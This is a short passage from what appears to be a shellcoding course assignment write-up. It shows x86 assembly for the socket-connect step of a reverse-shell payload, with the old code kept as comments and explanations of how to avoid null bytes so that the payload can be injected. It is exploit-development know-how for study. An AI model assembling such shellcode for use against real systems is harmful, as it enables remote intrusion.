We need to get rid of the null-bytes. In assembly, alternative instructions should be used which mitigate the null-bytes. Numerous methods exist, such as XOR’ing a registry by itself and moving the XOR’ed value to the destination register, when in need for string termination.
For reasons of saving pages explaining why every modified instruction is modified, I’ve included comment sections for every function which explains the modifications.
Because a lot of code is being reused, only the added part of the function “connect” will be shown.
For other function, please see Assignment 1.
Connect socket
Same code as for binding the socket in assignment one, the only difference is the calling function 3 (sys_connect) instead of calling function 2 (sys_bind).
; Connect socket
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
; connect(sock, (struct sockaddr *) &sockaddr, sizeof(sockaddr));
; BEGIN OLD CODE COMMENTED DUE TO NULL BYTES
; mov eax, 102 ; socketcall
; mov ebx, 3 ; socketcall type 3 (sys_connect)
; push 0 ; IPPROTO_IP 0
; push 1 ; SOCK_STREAM 1
; push 2 ; AF_INET 2
; END OLD CODE COMMENTED DUE TO NULL BYTES
mov al, 102 ; socketcall, moving to lower region of AX
mov bl, 3 ; socketcall type 3 (sys_connect), moving to lower region of BX
; sys_connect arguments
push 16 ; sockaddr struct, sizeof(struct sockaddr) = 16
push ecx ; Pointer to sockaddr_in
push edx ; FD socket
mov ecx, esp ; Argument array pointer
int 0x80 ; syscall, calling with arguments